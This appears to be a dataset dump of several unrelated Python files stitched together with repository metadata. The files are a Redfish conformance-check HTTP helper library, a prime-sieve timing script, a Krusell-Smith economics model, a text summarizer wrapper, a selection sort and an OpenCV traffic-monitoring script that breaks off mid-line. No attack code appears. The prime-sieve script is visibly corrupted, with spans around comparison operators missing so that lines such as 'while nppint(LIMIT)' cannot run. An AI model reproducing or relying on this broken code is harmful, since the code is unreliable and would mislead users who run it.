Arguments:\n# login : login name\n# password : password\n#\n# Returns: encoded authorization header value \n###############################################################################################\ndef get_auth_encoded(login, password) :\n if (Python3 == True):\n bstr = login + \":\" + password\n bencode = base64.b64encode(bstr.encode(), altchars=None) \n authorization = (\"Basic \" + bencode.decode())\n else: # python 2.x\n authorization = (\"Basic \" + base64.b64encode(login + \":\" + password))\n\n return authorization\n \n## end get_auth_encoded\n\n\n###############################################################################################\n# Name: http__req_resp() \n# Description: \n# common code for the http requests -- this function:\n# 1. sets up the authorization header\n# 2. posts the requests\n# 3. recieves the response\n# \n# Arguments:\n# http_req: the request type (GET, DELETE... etc)\n# resource_uri: the uri of the redfish resource\n# rq_headers: the reqeuest headers\n# rq_body: the body of the request in json format\n# auth_on_off: if set to 'on' then authorization is enabled for the request \n# by adding the 'Authorization' header to the request; else the request\n# is made without this function adding authorization parameters into \n# the request headers\n#\n# Returns:\n# response: the response recieved \n###############################################################################################\ndef http__req_resp(sut_prop, http_req, resource_uri, rq_headers, rq_body, auth_on_off) :\n\n if (rq_headers == None):\n rq_headers = create_request_headers()\n\n # default to https unless overridden via \"UseHttp\" in the SUT config\n proto = \"https\"\n if \"UseHttp\" in sut_prop:\n use_http = sut_prop.get(\"UseHttp\").lower()\n if use_http in [\"yes\", \"true\", \"on\"]:\n proto = \"http\"\n\n url = None\n # if dsn name is not prepended to the uri, then prepend uri with https protocol and dnsname as per redfish service requirement\n if sut_prop['DnsName'] not in resource_uri:\n url = urlparse(proto + \"://\" + sut_prop['DnsName'] + resource_uri)\n else:\n url = urlparse(resource_uri)\n \n if not url:\n print('Could not parse the url %s' % resource_uri)\n exit(0)\n else:\n url_ip = url.netloc\n url_path = url.path\n\n if url.scheme == 'https':\n ### get fresh connection\n server_connection = Connect_Server_NoSSL(sut_prop, url_ip)\n # handle http, for conformance test purpose, sometimes we use http\n elif url.scheme == 'http':\n server_connection = Connect_Server_NoSSL_NoHTTPS(sut_prop, url_ip)\n else:\n server_connection = Connect_Server_NoSSL(sut_prop, url_ip)\n\n # setup auth header: set login name and password for the sut_prop...\n if (auth_on_off == 'on'):\n http__set_auth_header(rq_headers, sut_prop['LoginName'], sut_prop['Password'])\n\n # issue the http request\n try:\n server_connection.request(http_req, url_path, headers=rq_headers, body=rq_body)\n except:\n exc_str = sys.exc_info()[0]\n print ('OPERATIONAL ERROR: %s Request for %s FAILED with exeption: %s' % (http_req, url_path, exc_str)) \n return \n else:\n # receive the response and payload\n try:\n response = server_connection.getresponse()\n except:\n exc_str = sys.exc_info()[0]\n print ('OPERATIONAL ERROR: %s getresponse() for %s failed with exeption: %s - exiting test..' % (http_req, url_path, exc_str))\n return\n else:\n return(response)\n#\n## end http__req_resp\n\n\n###############################################################################################\n# Name: http__req_common() \n# Description: \n# common code for the http requests -- this function processes response headers\n# for gzip as well as redirect prior to returning the payload\n# \n# Arguments:\n# http_req: the request type (GET, DELETE... etc)\n# resource_uri: the uri of the redfish resource\n# rq_headers: the reqeuest headers\n# rq_body: the body of the request in json format\n# auth_on_off: if set to 'on' then authorization is enabled for the request \n# by adding the 'Authorization' header to the request; else the request\n# is made without this function adding authorization parameters into \n# the request headers\n#\n# Returns:\n# r_payload: this is the response payload. If the response headers specify\n# gzip encoding then the payload is un-gzip'd prior to return - otherwise\n# it is returned as recieved from the server\n# r_headers: response headers (keys converted to lower case)\n# response.status: the http status code returned from the request \n###############################################################################################\ndef http__req_common(sut_prop, http_req, resource_uri, rq_headers, rq_body, auth_on_off, cookie_info = None) :\n ## issue the base request/get the response\n r_response = http__req_resp(sut_prop, http_req, resource_uri, rq_headers, rq_body, auth_on_off)\n if r_response:\n try:\n r_payload = r_response.read()\n except:\n exc_str = sys.exc_info()[0]\n print(\"Error trying to read http response: %s\" % exc_str)\n else:\n # get the headers associated with the resp\n # convert the keys to lowercase so that string searches can be made w/o concern for case.. \n r_headers = dict()\n for key, value in r_response.getheaders():\n key = key.lower()\n if key in r_headers:\n r_headers[key] += ',' + value\n else:\n r_headers[key] = value\n\n #handle any http redirect... recursive call here... \n if (\"location\" in r_headers.keys()) and (r_headers['location'] != resource_uri and r_response.status>= 300 and r_response.status < 400):\n redirected_resource_uri = urlparse(r_headers['location'])\n return(http__req_common(sut_prop, http_req, redirected_resource_uri.path, rq_headers, rq_body, auth_on_off, cookie_info))\n\n if not r_response.status:\n print('SERVICE ERROR: No Response Status found for request %s:%s' % (http_req, resource_uri))\n\n if cookie_info:\n cookie_detail = tuple()\n #set cookie True if Set-Cookie is found, service is not expected to return Cookies in the header\n if 'set-cookie' in r_headers.keys():\n cookie_info[0] = True\n cookie_info[2] += 1\n # set details of request type and url where cookie was found\n cookie_detail = (http_req , resource_uri)\n cookie_info[1].append(cookie_detail)\n \n\n # check to see if the payload is gzip'd - if so un-gzip it\n if ('content-encoding' in r_headers.keys()):\n if (r_headers['content-encoding'] == 'gzip'):\n #un-gzip the payload\n try:\n if (Python3 == True):\n gz_payload = gzip.GzipFile(fileobj=BytesIO(r_payload))\n\n else: # Python2\n gz_payload = gzip.GzipFile(fileobj=StringIO(r_payload))\n \n r_payload = gz_payload.read()\n\n except:\n exc_str = sys.exc_info()[0]\n print(\"Error trying to un-gzip payload: %s\" % exc_str)\n\n # if a payload is returned in json format then load it into a json dictionary here...\n is_json = False\n if 'content-type' in r_headers.keys() :\n if ('application/json' in r_headers['content-type']):\n is_json = True\n if (r_payload) : # if there is a resp payload ...\n try:\n r_payload = json.loads(r_payload.decode('utf-8'))\n except:\n exc_str = sys.exc_info()[0]\n print (\"Error trying load %s payload to JSON: %s\" % (resource_uri, exc_str))\n ''' \n #log dump \n # dump the response headers and payload to the text log file\n if (is_json == True):\n if (r_payload):\n print(\"response: %s %s\" % (json_string(r_headers), json_string(r_payload)) )\n else:\n print(\"response: %s\" % json_string(r_headers) )\n \n else:\n if (r_payload):\n print(\"response: %s %s\" % (r_headers, r_payload)) \n else:\n print(\"response: %s\" % r_headers) \n '''\n\n return (r_payload, r_headers, r_response.status)\n\n else:\n #print('WARN: No response retreived from %s' %(resource_uri))\n return None, None, None\n#\n## end http__req_common\n\n###############################################################################################\n# Name: http__modify_resource() \n# Description: issue a request to the server connection/URI which\n# modifies a resource (POST, PATCH, PUT, DELETE)\n# \n# Arguments:\n# rq_type: POST, PATCH, PUT or DELETE\n# resource_uri: the uri of the redfish resource\n# rq_headers: the request headers. If Content-Type is not specified\n# then this routine will set it to json before making the request. \n# rq__body: the body of the request. this can be json or a python dict - this routine \n# converts it to json for the reqeust\n# auth_on_off: if set to 'on' then authorization is enabled for the request \n# by adding the 'Authorization' header to the request; else the request\n# is made with no authorization parameters specified in the request headers \n#\n# Returns:\n# r_payload: this is the json response payload\n# r_headers: response headers (keys converted to lower case)\n# r_status: the http status code returned from the request\n###############################################################################################\ndef http__modify_resource(sut_prop, rq_type, resource_uri, rq_headers, rq_body, auth_on_off) :\n\n if (rq_headers == None):\n rq_headers = create_request_headers()\n \n # this routine can take a python dictionary as a request body... or json\n # make sure the request is json format..\n if rq_body:\n rq_body = json.dumps(rq_body)\n\n # issue the request\n return(http__req_common(sut_prop, rq_type, resource_uri, rq_headers, rq_body, auth_on_off ))\n\n#\n## end http__modify_resource\n\n###############################################################################################\n# Name: http__GET(sut_prop, resource_uri, rq_headers, auth_on_off, cookie_info = None) \n# Issue a GET request for resource uri thru base http__req_common() \n# Takes service connection prop, resource uri, request header dict, authorization 'on' or 'off'\n# optional cookie info to track cookies in request response\n# Returns:\n# - Response payload dict or string depending on 'content-type' in request header. If\n# 'application/json' then payload will be a dict. \n# - Response Headers dict: header keys in lower case\n# - Response Status code: http status code returned from the request \n###############################################################################################\ndef http__GET(sut_prop, resource_uri, rq_headers, auth_on_off, cookie_info = None ) : \n if (rq_headers == None):\n rq_headers = create_request_headers()\n # issue the GET on the resource...\n return (http__req_common(sut_prop, \"GET\", resource_uri, rq_headers, None, auth_on_off, cookie_info))\n\n#\n## end http__GET\n\n###############################################################################################\n# Name: http__POST(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off) \n# Issue a POST request for resource uri thru base http__req_common() \n# Takes service connection prop, resource uri, request header dict, request body authorization \n# 'on' or 'off'\n# Returns:\n# - Response payload dict or string depending on 'content-type' in request header. If\n# 'application/json' then payload will be a dict. \n# - Response Headers dict: header keys in lower case\n# - Response Status code: http status code returned from the request \n###############################################################################################\ndef http__POST(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off) :\n if (rq_headers == None):\n rq_headers = create_request_headers()\n return(http__modify_resource(sut_prop, \"POST\", resource_uri, rq_headers, rq_body, auth_on_off))\n\n#\n## end http__POST\n\n###############################################################################################\n# Name: http__TRACE(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off, cookie_info = None) \n# Issue a TRACE request for resource uri thru base http__req_common() \n# Takes service connection prop, resource uri, request header dict, request body authorization \n# 'on' or 'off'. optional cookie info to track cookies in request response\n# Returns:\n# - Response payload dict or string depending on 'content-type' in request header. If\n# 'application/json' then payload will be a dict. \n# - Response Headers dict: header keys in lower case\n# - Response Status code: http status code returned from the request \n###############################################################################################\ndef http__TRACE(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off, cookie_info = None) :\n if (rq_headers == None):\n rq_headers = create_request_headers()\n return(http__req_common(sut_prop, \"TRACE\", resource_uri, rq_headers, rq_body, auth_on_off, cookie_info ))\n\n#\n## end http__TRACE\n\n###############################################################################################\n# Name: http__OPTIONS(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off) \n# Issue a OPTIONS request for resource uri thru base http__req_common() \n# Takes service connection prop, resource uri, request header dict, request body authorization \n# 'on' or 'off'. optional cookie info to track cookies in request response\n# Returns:\n# - Response payload dict or string depending on 'content-type' in request header. If\n# 'application/json' then payload will be a dict. \n# - Response Headers dict: header keys in lower case\n# - Response Status code: http status code returned from the request \n###############################################################################################\ndef http__OPTIONS(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off, cookie_info = None) :\n if (rq_headers == None):\n rq_headers = create_request_headers()\n return(http__req_common(sut_prop, \"OPTIONS\", resource_uri, rq_headers, rq_body, auth_on_off, cookie_info ))\n\n#\n## end http__OPTIONS\n\n###############################################################################################\n# Name: http__PATCH(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off) \n# Issue a PATCH request for resource uri thru base http__req_common() \n# Takes service connection prop, resource uri, request header dict, request body authorization \n# 'on' or 'off'\n# Returns:\n# - Response payload dict or string depending on 'content-type' in request header. If\n# 'application/json' then payload will be a dict. \n# - Response Headers dict: header keys in lower case\n# - Response Status code: http status code returned from the request \n###############################################################################################\ndef http__PATCH(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off) :\n if (rq_headers == None):\n rq_headers = create_request_headers()\n return(http__modify_resource(sut_prop, \"PATCH\", resource_uri, rq_headers, rq_body, auth_on_off))\n#\n## end http__PATCH\n\n###############################################################################################\n# Name: http__PUT(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off) \n# Issue a PUT request for resource uri thru base http__req_common() \n# Takes service connection prop, resource uri, request header dict, request body authorization \n# 'on' or 'off'\n# Returns:\n# - Response payload dict or string depending on 'content-type' in request header. If\n# 'application/json' then payload will be a dict. \n# - Response Headers dict: header keys in lower case\n# - Response Status code: http status code returned from the request \n###############################################################################################\ndef http__PUT(sut_prop, resource_uri, rq_headers, rq_body, auth_on_off) :\n if (rq_headers == None):\n rq_headers = create_request_headers()\n return(http__modify_resource(sut_prop, \"PUT\", resource_uri, rq_headers, rq_body, auth_on_off))\n\n#\n## end http__PUT\n\n###############################################################################################\n# Name: http__HEAD(sut_prop, resource_uri, rq_headers, auth_on_off, cookie_info = None) \n# Issue a HEAD request for resource uri thru base http__req_common() \n# Takes service connection prop, resource uri, request header dict, authorization 'on' or 'off'\n# optional cookie info to track cookies in request response\n# Returns:\n# - Response payload dict or string depending on 'content-type' in request header. If\n# 'application/json' then payload will be a dict. \n# - Response Headers dict: header keys in lower case\n# - Response Status code: http status code returned from the request \n###############################################################################################\ndef http__HEAD(sut_prop, resource_uri, rq_headers, auth_on_off, cookie_info = None) :\n if (rq_headers == None):\n rq_headers = create_request_headers()\n return(http__req_common(sut_prop, \"HEAD\", resource_uri, rq_headers, None, auth_on_off, cookie_info))\n#\n## end http__HEAD\n\n\n###############################################################################################\n# Name: http__DELETE(sut_prop, resource_uri, rq_headers, auth_on_off) \n# Issue a DELETE request for resource uri thru base http__req_common() \n# Takes service connection prop, resource uri, request header dict, authorization 'on' or 'off'\n# Returns:\n# - Response payload dict or string depending on 'content-type' in request header. If\n# 'application/json' then payload will be a dict. \n# - Response Headers dict: header keys in lower case\n# - Response Status code: http status code returned from the request \n###############################################################################################\ndef http__DELETE(sut_prop, resource_uri, rq_headers, auth_on_off) :\n if (rq_headers == None):\n rq_headers = create_request_headers()\n return(http__modify_resource(sut_prop, \"DELETE\", resource_uri, rq_headers, None, auth_on_off))\n\n#\n## end http__DELETE\n\n###############################################################################################\n# Name: create_request_headers() \n# Creates required request header used globally throughout rfs_check.py additional headers \n# can be added as per assertioin requirements\n# Return:\n# request header dictionary\n# Note: set all headers that are expected to be recognized by the service as per spec\n###############################################################################################\ndef create_request_headers():\n rq_headers = dict() \n rq_headers['Accept'] = accept_type['json']\n rq_headers['Content-Type'] = 'application/json'\n rq_headers['OData-Version'] = default_odata_version\n return rq_headers\n \n###############################################################################################\n# Name: HTTP_status_string(HTTP_status_code) \n# Takes an HTTP status code in integer form and maps it to a string form\n# Return:\n# String version of HTTP code \n###############################################################################################\ndef HTTP_status_string(HTTP_status_code):\n return (str(responses[HTTP_status_code]))\n\n###############################################################################################\n# Name: json_string(json_text) \n# Takes json payload in dictionary format and returns in a readable format \n###############################################################################################\ndef json_string(json_text) :\n return(json.dumps(json_text, indent=2, separators=(',', ': ')))\n\n###############################################################################################\n# Name: json_get_key_value(json_text, key) \n# Takes a json payload dictionary and key. Finds and return a value for the key in the payload \n###############################################################################################\ndef json_get_key_value(json_text, key) :\n status = False\n val = None\n\n for skey, value in json_text.items():\n if (key.lower() == skey.lower()):\n status = True\n # found the key...\n if value:\n if isinstance(value, dict):\t\t\n for val in value.keys(): \n break\n elif isinstance(value, str) or isinstance(value, list) :\n val = value\n break\n\n return(status, val)\n\n###############################################################################################\n# Name: parse_odata_type(odata_type)\n# Parses an @odata.type into namespace and typename strings\n# Retrun:\n# namespace string, typename string \n############################################################################################### \ndef parse_odata_type(odata_type):\n namespace = None\n typename = None\n if '#' in odata_type:\n odata_type = odata_type.split('#')[1]\n\n split_type = odata_type.rsplit('.', 1)\n if len(split_type) > 1:\n namespace = split_type[0]\n typename = split_type[1] \n\n return namespace, typename\n\n###############################################################################################\n# Name: parse_unversioned_odata_type(odata_type)\n# Parses an @odata.type into namespace and typename strings. Removes version from namespace \n# Retrun:\n# unversion namespace string, typename string \n############################################################################################### \ndef parse_unversioned_odata_type(odata_type):\n namespace = None\n typename = None\n if '#' in odata_type:\n odata_type = odata_type.split('#')[1]\n\n split_type = odata_type.rsplit('.', 1)\n if len(split_type) > 1:\n namespace = split_type[0]\n typename = split_type[1] \n\n if '.' in namespace:\n namespace = namespace.split('.')[0]\n\n return typename\n\n###############################################################################################\n# Name: get_resource_json_metadata(namespace, json_directory)\n# Takes namespace string and directory path for json schemas. Walks the direcotry to find the\n# json schema for that namespace and loads json in a string\n# Return:\n# If found, returns string loaded with json schema and schema file path\n############################################################################################### \ndef get_resource_json_metadata(namespace, json_directory): \n for dirpath, dirnames, files in os.walk(json_directory):\n for schema_file in files:\n if (namespace + '.json') == schema_file:\n json_file = os.path.join(dirpath, schema_file)\n if json_file:\n with open(json_file) as data_file: \n data = json.load(data_file)\n return data, schema_file\n return None, None\n","repo_name":"DMTF/Redfish-Service-Conformance-Check","sub_path":"rf_utility.py","file_name":"rf_utility.py","file_ext":"py","file_size_in_byte":32168,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"21934802417","text":"#EFFICIENCY\r\nfrom math import sqrt\r\nfrom time import time\r\n\r\nLIMIT = 1 * 10 ** 6\r\n\r\nstart = time()\r\n\r\nsqrtlim=sqrt(float(LIMIT))\r\npp=2\r\nep=[pp]\r\nss=[pp]\r\npp+=1\r\ni=0\r\nrss=[ss[0]]\r\ntp=[pp]\r\nxp=[]\r\npp+=ss[0]\r\nnpp=pp\r\ntp.append(npp)\r\nrss.append(rss[i]*tp[0])\r\nwhile nppint(LIMIT): break\r\n\t\t\t\t\t\tif npp<=rss[i]+1: pp=npp\r\n\t\t\t\t\t\tsqrtnpp=sqrt(npp)\r\n\t\t\t\t\t\ttest=True\r\n\t\t\t\t\t\tfor q in tp:\r\n\t\t\t\t\t\t\t\tif sqrtnppint(LIMIT): break\r\n\t\tif npp>int(LIMIT): break\r\n\t\tlrpp=pp\r\n\t\tnss=[]\r\n\t\twhile pp<(rss[i]+1)*2-1:\r\n\t\t\t\tfor n in ss:\r\n\t\t\t\t\t\tnpp=pp+n\r\n\t\t\t\t\t\tif npp>int(LIMIT): break\r\n\t\t\t\t\t\tsqrtnpp=sqrt(npp)\r\n\t\t\t\t\t\ttest=True\r\n\t\t\t\t\t\tfor q in tp:\r\n\t\t\t\t\t\t\t\tif sqrtnppint(LIMIT): break\r\n\t\tif npp>int(LIMIT): break\r\n\t\tss=nss\r\n\t\tep.append(tp[0])\r\n\t\tdel tp[0]\r\n\t\trss.append(rss[i]*tp[0])\r\n\t\tnpp=lrpp\r\ni=nss=npp=n=sqrtnpp=test=q=r=lrpp=rss=ss=pp=sqrtlim=0\r\nep.reverse()\r\n[tp.insert(0,a) for a in ep]\r\ntp.reverse()\r\n[xp.insert(0,a) for a in tp]\r\n\r\nfinish = time()\r\nelapsed = finish - start\r\nprint(\"%.3f\" % elapsed)","repo_name":"hathix/prime-algorithms","sub_path":"efficiency.py","file_name":"efficiency.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"19303342199","text":"import numpy as np\nimport scipy.optimize as opt\nimport utils\nimport het_block as het\nfrom simple_block import simple\n\n\n'''Part 1: HA block'''\n\n\ndef backward_iterate(Va_p, Pi_p, a_grid, e_grid, r, w, beta, eis):\n \"\"\"Single backward iteration step using endogenous gridpoint method for households with CRRA utility.\n\n Order of returns matters! backward_var, assets, others\n\n Parameters\n ----------\n Va_p : np.ndarray\n marginal value of assets tomorrow\n Pi_p : np.ndarray\n Markov transition matrix for skills tomorrow\n a_grid : np.ndarray\n asset grid\n e_grid : np.ndarray\n skill grid\n r : float\n ex-post interest rate\n w : float\n wage\n beta : float\n discount rate today\n eis : float\n elasticity of intertemporal substitution\n\n Returns\n ----------\n Va : np.ndarray, shape(nS, nA)\n marginal value of assets today\n a : np.ndarray, shape(nS, nA)\n asset policy today\n c : np.ndarray, shape(nS, nA)\n consumption policy today\n \"\"\"\n uc_nextgrid = (beta * Pi_p) @ Va_p\n c_nextgrid = uc_nextgrid ** (-eis)\n coh = (1 + r) * a_grid[np.newaxis, :] + w * e_grid[:, np.newaxis]\n a = utils.interpolate_y(c_nextgrid + a_grid, coh, a_grid)\n utils.setmin(a, a_grid[0])\n c = coh - a\n Va = (1 + r) * c ** (-1 / eis)\n return Va, a, c\n\n\nhousehold = het.HetBlock(backward_iterate, exogenous='Pi', policy='a', backward='Va')\n\n\n'''Part 2: Simple Blocks'''\n\n\n@simple\ndef firm(K, L, Z, alpha, delta):\n r = alpha * Z * (K(-1) / L) ** (alpha-1) - delta\n w = (1 - alpha) * Z * (K(-1) / L) ** alpha\n Y = Z * K(-1) ** alpha * L ** (1 - alpha)\n return r, w, Y\n\n\n@simple\ndef mkt_clearing(K, A):\n asset_mkt = K - A\n return asset_mkt\n\n\n'''Part 3: Steady state'''\n\n\ndef ks_ss(lb=0.98, ub=0.999, r=0.01, eis=1, delta=0.025, alpha=0.11, rho=0.966, sigma=0.5, nS=7, nA=500, amax=200):\n \"\"\"Solve steady state of full GE model. Calibrate beta to hit target for interest rate.\"\"\"\n # set up grid\n a_grid = utils.agrid(amax=amax, n=nA)\n e_grid, _, Pi = utils.markov_rouwenhorst(rho=rho, sigma=sigma, N=nS)\n\n # solve for aggregates analytically\n rk = r + delta\n Z = (rk / alpha) ** alpha # normalize so that Y=1\n K = (alpha * Z / rk) ** (1 / (1 - alpha))\n Y = Z * K ** alpha\n w = (1 - alpha) * Z * (alpha * Z / rk) ** (alpha / (1 - alpha))\n\n # figure out initializer\n coh = (1 + r) * a_grid[np.newaxis, :] + w * e_grid[:, np.newaxis]\n Va = (1 + r) * (0.1 * coh) ** (-1 / eis)\n\n # solve for beta consistent with this\n beta_min = lb / (1 + r)\n beta_max = ub / (1 + r)\n beta, sol = opt.brentq(lambda bet: household.ss(Pi=Pi, a_grid=a_grid, e_grid=e_grid, r=r, w=w, beta=bet, eis=eis,\n Va=Va)['A'] - K, beta_min, beta_max, full_output=True)\n if not sol.converged:\n raise ValueError('Steady-state solver did not converge.')\n\n # extra evaluation to report variables\n ss = household.ss(Pi=Pi, a_grid=a_grid, e_grid=e_grid, r=r, w=w, beta=beta, eis=eis, Va=Va)\n ss.update({'Z': Z, 'K': K, 'L': 1, 'Y': Y, 'alpha': alpha, 'delta': delta, 'goods_mkt': Y - ss['C'] - delta * K})\n\n return ss\n","repo_name":"EmilHP/sequence-jacobian-master","sub_path":"krusell_smith.py","file_name":"krusell_smith.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"36378614848","text":"from src.backbone import WindowEmbedder, Generator, Extractor\n\n\nclass SubtextSummarizer:\n '''\n Info:\n Arguments:\n args\n ckpt_path: path to the pre-trained kobertsum weights\n '''\n def __init__(self, args=None, ckpt_path='', input_script=[]):\n self.args = args\n self.ckpt_path = ckpt_path\n self.input_script = ['\\n'.join(script) for script in input_script]\n \n def summarize_subtexts(self):\n # extractive summary\n if self.args.summarizer_type == 'ext':\n summarizer = Extractor(args=self.args, use_gpu=True, checkpoint_path=self.ckpt_path)\n else:\n summarizer = Generator(args=self.args, use_gpu=True, checkpoint_path=self.ckpt_path)\n\n summary_result = []\n for src in self.input_script:\n summary = summarizer.summarize(src, \"\\n\")\n if self.args.summarizer_type == 'ext':\n summary = self._sort_summary(summary)\n summary_result.append(summary)\n \n return summary_result\n \n def _sort_summary(self, summary_input):\n '''\n Info: Sort summary result in ascending order\n '''\n summary_text = summary_input[0][0].split('. ')\n summary_idx = summary_input[1][0]\n to_sort = list(zip(summary_text, summary_idx))\n \n to_sort.sort(key=lambda x: x[1])\n sorted_summary = [cont[0] for cont in to_sort]\n \n return sorted_summary","repo_name":"euisuk-chung/youtube_summarizer","sub_path":"src/subtext/src/summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"19738527554","text":"# Selection Sort\n\ndef selection_sort(arr,n):\n for i in range(n-1): # loops from index 0 to second last element (n-2), coz if we include last index too then at last iteration there will be only one element left to search or sort by the time the arr will be sorted\n lower = i # initially consider index 0 as lower \n for j in range(lower+1,n): # from index 1 to last index \n if arr[j] < arr[lower]: # checks whether any element smaller than the element at index 0 as we assign like that above\n lower = j # if so then assign that elemnt's index as lower \n if lower != i: # now we check if the index of the new lower element stored in (lower) is != the orginal index (i) that we 1st assigned as i (j != i)\n # swapping # if != then swap index 0 arr[i] of array with new lower ele - arr[lower] and move the ele in index 0 to this new lower elements index i.e arr[lower]\n # temp = arr[i]\n # arr[i] = arr[lower]\n # arr[lower] = temp \n arr[i], arr[lower] = arr[lower], arr[i] # swapping\n \n return arr\n\nlimit = int(input())\narray = [ int(input()) for i in range(limit) ]\n\nprint(selection_sort(array,limit))","repo_name":"Sahal-Rasheed/Python-Guide","sub_path":"sorting/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40893115263","text":"#!/usr/bin/env python2\nfrom __future__ import print_function, division\nimport os\nimport sys\nimport json\n\nimport cv2\nimport numpy as np\nfrom pprint import pprint\n\npath_this = os.path.abspath (os.path.dirname (__file__))\nsys.path.append (os.path.join (path_this, '..', '..'))\n\nfrom geometry import get_extreme_tan_point, Line, get_extreme_side_point, find_right_most_point\nfrom util import *\nfrom iterator import FrameIterator\nfrom background import BackgroundModel\n\ndef draw_polylines (img, corner, color=(0,0,255), thickness=5) : \n img = img.copy ()\n\n cornerInt = []\n for c in corner : \n cornerInt.append (tuple ([int (_) for _ in c]))\n\n corner = np.array (corner, np.int32)\n corner = corner.reshape ((-1, 1, 2))\n\n cv2.polylines (img, [corner], True , color, thickness)\n return img\n\ndef get_corner_ground (vp1, vp2, points) : \n # convention of points : \n # [left, top, right, bottom]\n\n lines = [\n Line.from_two_points (vp1, points[0]), # left line\n Line.from_two_points (vp2, points[1]), # top line,\n Line.from_two_points (vp1, points[2]), # right line\n Line.from_two_points (vp2, points[3]) # bottom line\n ]\n\n corner = (\n lines[0].get_intersection (lines[1]), # top left corner\n lines[1].get_intersection (lines[2]), # top right corner\n lines[2].get_intersection (lines[3]), # bottom right corner\n lines[3].get_intersection (lines[0]) # bottom left corner\n )\n \n return corner\n\ndef TSI_get_contours (frame_binary, min_area=200, min_width=70) :\n contours_selected = []\n\n im2, contours, hierarchy = cv2.findContours(\n frame_binary, \n cv2.RETR_TREE, \n cv2.CHAIN_APPROX_SIMPLE\n )\n\n # select contour that greater than the specified $min_area and\n # not part of other contour (specified by its hierarchy)\n # additionally, its width must be greater than $min_width\n for c_idx, c in enumerate (contours) :\n (x,y, w, h) = cv2.boundingRect (c)\n if cv2.contourArea(c) > min_area and hierarchy[0][c_idx][3] < 0 and \\\n h > min_width:\n contours_selected.append (c)\n\n return contours_selected\n\nVP = VPLoader ()\n\nVIEW = (\"right\", \"center\", \"left\")\nwith open (\"/home/adib/My Git/traffic-monitoring/data/sync_25fps/common_point/result.json\", \"r\") as f_buf : \n GT = json.load (f_buf)\n\ncv2.namedWindow ('default', flags=cv2.WINDOW_NORMAL)\nimg_path = '/home/adib/My Git/traffic-monitoring/data/gt/2016-ITS-BrnoCompSpeed/dataset/session{}_{}/screen.png'\n\nses_id = 5 \nvp = VP.get_session (ses_id)\nfi = FrameIteratorLoader.get_session (ses_id)\n\nM = {} # matrix homography\nts_img = {} # initalization of time spatial image\nprev_img = {} # prev 2 image for 3 frame differance\nprev_tsi = {} # prev 2 image for 3 frame difference time spatial image\nbms = {} # background model MoG\nVDL_IDX = 100 # column index of VDL\nVDL_SIZE = 5 # size of VDL\nmasks = {} # for masks \ncolor = (0,0,255)\nimgs_color = {} # for saving image color each view\nfgs = {}\n\nfor view in VIEW : \n img = cv2.imread (img_path.format (ses_id, view), 1)\n\n points = GT['session{}'.format (ses_id)][view]\n corner = get_corner_ground (vp[view]['vp1'], vp[view]['vp2'], points)\n\n # get rectangular homography mapping\n corner_gt = np.float32 (corner)\n corner_wrap = np.float32 ([[0,300],[0,0], [1000,0], [1000, 300]])\n M[view] = cv2.getPerspectiveTransform (corner_gt, corner_wrap)\n\n # background subtraction\n bms[view] = BackgroundModel (fi[view], detectShadows=False)\n bms[view].learn (tot_frame_init=2)\n\n # for initialization\n ts_img[view] = None\n\n # for 3 frame difference\n prev_img[view] = [None, None]\n for i in range (2) : \n img = next (fi[view])\n img_color = img.copy ()\n img = cv2.cvtColor (img, cv2.COLOR_BGR2GRAY)\n\n # save background\n prev_img[view][i] = img \n\n prev_tsi[view] = [None, None]\n\n # laod mask\n mask_path = '../../data/gt/2016-ITS-BrnoCompSpeed/dataset/session{}_{}/video_mask.png'.format (ses_id, view)\n masks[view] = cv2.imread (mask_path, 0)\n\nctr = 0\nwhile True:\n ctr += 1\n\n for view in VIEW : \n img_color = next (fi[view])\n imgs_color[view] = img_color\n img = cv2.cvtColor (img_color, cv2.COLOR_BGR2GRAY)\n\n # normal 3FD\n prev_intersect = cv2.threshold (cv2.absdiff (prev_img[view][1], prev_img[view][0]), 25, 255, cv2.THRESH_BINARY)[1]\n next_intersect = cv2.threshold (cv2.absdiff (img, prev_img[view][1]), 25, 255, cv2.THRESH_BINARY)[1]\n\n # litle 3FD enhanchement\n P1 = cv2.bitwise_and (prev_intersect, next_intersect)\n prev_intersect_dilate = process_morphological (prev_intersect) \n next_intersect_dilate = process_morphological (next_intersect)\n P2 = cv2.bitwise_and (prev_intersect_dilate, next_intersect_dilate)\n\n fg = cv2.bitwise_and (P2, masks[view])\n fg = process_morphological (fg)\n\n fgs[view] = fg\n\n # update\n prev_img[view][0] = prev_img[view][1]\n prev_img[view][1] = img\n\n print (ctr)\n if ctr == 284 : \n with open (\"result/3_3D_box/box_ground.json\", 'r') as f_b : \n boxes_ground = json.load (f_b)\n\n for view in VIEW : \n # first, draw ground truth\n points = GT['session{}'.format (ses_id)][view]\n corner = np.float32 (get_corner_ground (vp[view]['vp1'], vp[view]['vp2'], points))\n\n \"\"\"\n # get dst_color with rectangle\n box_ground = np.matrix ([\n [VDL_IDX + 600, selected[1] + selected[3], 1], # (bottom, left)\n [VDL_IDX + 600, selected[1], 1], # (top, left)\n [VDL_IDX + 600 + selected[2], selected[1], 1], # (top, right)\n [VDL_IDX + 600 + selected[2], selected[1] + selected[3], 1] # (bottom, right)\n ]).transpose ()\n # \"\"\"\n\n # get inverse perspective\n M_inv = cv2.getPerspectiveTransform (corner_wrap, corner)\n \n \"\"\"\n # draw on the real image\n # box_ground = M_inv.dot (box_ground).transpose () # get inverse location of box\n # box_ground /= box_ground[:, 